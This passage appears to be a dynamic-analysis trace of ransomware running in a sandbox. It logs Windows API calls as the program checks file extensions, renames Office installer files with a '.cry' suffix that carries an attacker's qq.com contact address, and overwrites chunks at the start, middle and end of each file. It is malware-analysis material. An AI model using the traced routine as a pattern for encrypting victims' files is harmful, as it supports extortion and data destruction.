lpString2="dll") returned -1 [0046.629] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.629] lstrlenW (lpString=".dbf") returned 4 [0046.629] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.629] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.629] lstrlenW (lpString=".1cd") returned 4 [0046.629] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.629] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.629] lstrlenW (lpString=".jpg") returned 4 [0046.629] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.629] lstrcmpiW (lpString1=".msi", lpString2=".cry") returned 1 [0046.629] lstrlenW (lpString="OfficeMUI.msi") returned 13 [0046.629] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0046.629] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=3702272) returned 1 [0046.629] CloseHandle (hObject=0x1f4) returned 1 [0046.629] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi")) returned 0x2020 [0046.629] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0046.629] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0046.630] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0046.630] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc6c | out: lpNewFilePointer=0x0) returned 1 [0046.630] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0046.630] ReadFile (in: hFile=0x1f4, lpBuffer=0x3950058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x3950058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.668] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x12d4aa, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0046.668] ReadFile (in: hFile=0x1f4, lpBuffer=0x3990058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x3990058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.860] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2d9fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0046.860] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x347e00, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0046.860] ReadFile (in: hFile=0x1f4, lpBuffer=0x39d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x39d0058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.152] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.152] WriteFile (in: hFile=0x1f4, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xc0106, lpNumberOfBytesWritten=0x2d9fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fcb0*=0xc0106, lpOverlapped=0x0) returned 1 [0047.230] SetEndOfFile (hFile=0x1f4) returned 1 [0047.230] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3fd40b0 [0047.236] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.236] WriteFile (in: hFile=0x1f4, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.237] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x12d4aa, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.237] WriteFile (in: hFile=0x1f4, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.241] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x347e00, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.241] WriteFile (in: hFile=0x1f4, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.243] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3fd40b0 | out: hHeap=0x600000) returned 1 [0047.243] CloseHandle (hObject=0x1f4) returned 1 [0047.243] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0047.244] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.244] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.244] lstrlenW (lpString=".doc") returned 4 [0047.244] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0047.244] lstrlenW (lpString=".docx") returned 5 [0047.244] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0047.244] lstrlenW (lpString=".pdf") returned 4 [0047.244] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0047.244] lstrlenW (lpString=".xls") returned 4 [0047.244] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0047.244] lstrlenW (lpString=".xlsx") returned 5 [0047.244] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0047.244] lstrlenW (lpString=".ppt") returned 4 [0047.244] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0047.244] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.244] lstrlenW (lpString=".zip") returned 4 [0047.244] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0047.244] lstrlenW (lpString=".rar") returned 4 [0047.244] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0047.244] lstrlenW (lpString=".bz2") returned 4 [0047.244] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0047.244] lstrlenW (lpString=".7z") returned 3 [0047.244] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0047.244] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.244] lstrlenW (lpString=".dbf") returned 4 [0047.244] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0047.244] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.244] lstrlenW (lpString=".1cd") returned 4 [0047.244] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0047.244] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.244] lstrlenW (lpString=".jpg") returned 4 [0047.244] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0047.244] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.244] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.245] lstrlenW (lpString=".doc") returned 4 [0047.245] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0047.245] lstrlenW (lpString=".docx") returned 5 [0047.245] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0047.245] lstrlenW (lpString=".pdf") returned 4 [0047.245] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0047.245] lstrlenW (lpString=".xls") returned 4 [0047.245] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0047.245] lstrlenW (lpString=".xlsx") returned 5 [0047.245] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0047.245] lstrlenW (lpString=".ppt") returned 4 [0047.245] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0047.245] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.245] lstrlenW (lpString=".zip") returned 4 [0047.245] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0047.245] lstrlenW (lpString=".rar") returned 4 [0047.245] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0047.245] lstrlenW (lpString=".bz2") returned 4 [0047.245] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0047.245] lstrlenW (lpString=".7z") returned 3 [0047.245] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0047.245] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.245] lstrlenW (lpString=".dbf") returned 4 [0047.245] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0047.245] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.245] lstrlenW (lpString=".1cd") returned 4 [0047.245] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0047.245] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.245] lstrlenW (lpString=".jpg") returned 4 [0047.245] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0047.245] lstrcmpiW (lpString1=".msi", lpString2=".cry") returned 1 [0047.246] lstrlenW (lpString="Office32WW.msi") returned 14 [0047.246] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0047.246] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1992192) returned 1 [0047.246] CloseHandle (hObject=0x1f4) returned 1 [0047.246] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi")) returned 0x2020 [0047.246] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0047.246] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0047.246] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0047.247] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc6c | out: lpNewFilePointer=0x0) returned 1 [0047.247] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.247] ReadFile (in: hFile=0x1f4, lpBuffer=0x3950058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x3950058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.543] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.543] ReadFile (in: hFile=0x1f4, lpBuffer=0x3990058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x3990058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.635] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2d9fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0047.635] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.635] ReadFile (in: hFile=0x1f4, lpBuffer=0x39d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x39d0058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.679] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.679] WriteFile (in: hFile=0x1f4, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x2d9fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0047.723] SetEndOfFile (hFile=0x1f4) returned 1 [0047.723] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x43b0048 [0047.728] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.728] WriteFile (in: hFile=0x1f4, lpBuffer=0x43b0048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x43b0048*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.729] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.729] WriteFile (in: hFile=0x1f4, lpBuffer=0x43b0048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x43b0048*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.731] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.731] WriteFile (in: hFile=0x1f4, lpBuffer=0x43b0048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x43b0048*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.733] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x43b0048 | out: hHeap=0x600000) returned 1 [0047.733] CloseHandle (hObject=0x1f4) returned 1 [0047.733] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0047.733] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0047.733] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0047.733] lstrlenW (lpString=".doc") returned 4 [0047.733] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0047.733] lstrlenW (lpString=".docx") returned 5 [0047.733] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0047.733] lstrlenW (lpString=".pdf") returned 4 [0047.733] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0047.733] lstrlenW (lpString=".xls") returned 4 [0047.733] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0047.734] lstrlenW (lpString=".xlsx") returned 5 [0047.734] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0047.734] lstrlenW (lpString=".ppt") returned 4 [0047.734] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0047.734] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0047.734] lstrlenW (lpString=".zip") returned 4 [0047.734] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0047.734] lstrlenW (lpString=".rar") returned 4 [0047.734] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0047.734] lstrlenW (lpString=".bz2") returned 4 [0047.734] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0047.734] lstrlenW (lpString=".7z") returned 3 [0047.734] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0047.734] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0047.734] lstrlenW (lpString=".dbf") returned 4 [0047.734] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0047.734] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0047.734] lstrlenW (lpString=".1cd") returned 4 [0047.734] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0047.734] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0047.734] lstrlenW (lpString=".jpg") returned 4 [0047.734] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0047.734] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0047.734] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0047.734] lstrlenW (lpString=".doc") returned 4 [0047.734] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0047.734] lstrlenW (lpString=".docx") returned 5 [0047.734] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0047.734] lstrlenW (lpString=".pdf") returned 4 [0047.734] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0047.734] lstrlenW (lpString=".xls") returned 4 [0047.734] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0047.734] lstrlenW (lpString=".xlsx") returned 5 [0047.734] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0047.734] lstrlenW (lpString=".ppt") returned 4 [0047.734] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0047.734] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0047.734] lstrlenW (lpString=".zip") returned 4 [0047.735] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0047.735] lstrlenW (lpString=".rar") returned 4 [0047.735] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0047.735] lstrlenW (lpString=".bz2") returned 4 [0047.735] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0047.735] lstrlenW (lpString=".7z") returned 3 [0047.735] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0047.735] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0047.735] lstrlenW (lpString=".dbf") returned 4 [0047.735] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0047.735] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0047.735] lstrlenW (lpString=".1cd") returned 4 [0047.735] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0047.735] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0047.735] lstrlenW (lpString=".jpg") returned 4 [0047.735] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0047.735] lstrcmpiW (lpString1=".cab", lpString2=".cry") returned -1 [0047.735] lstrlenW (lpString="OWOW32WW.cab") returned 12 [0047.735] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0047.735] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=36233052) returned 1 [0047.735] CloseHandle (hObject=0x1f4) returned 1 [0047.735] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab")) returned 0x2020 [0047.736] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0047.736] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0047.736] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0047.736] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc6c | out: lpNewFilePointer=0x0) returned 1 [0047.736] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.736] ReadFile (in: hFile=0x1f4, lpBuffer=0x3950058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x3950058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.783] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.783] ReadFile (in: hFile=0x1f4, lpBuffer=0x3990058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x3990058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.821] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2d9fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0047.821] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.821] ReadFile (in: hFile=0x1f4, lpBuffer=0x39d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x39d0058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.990] SetFilePointerEx 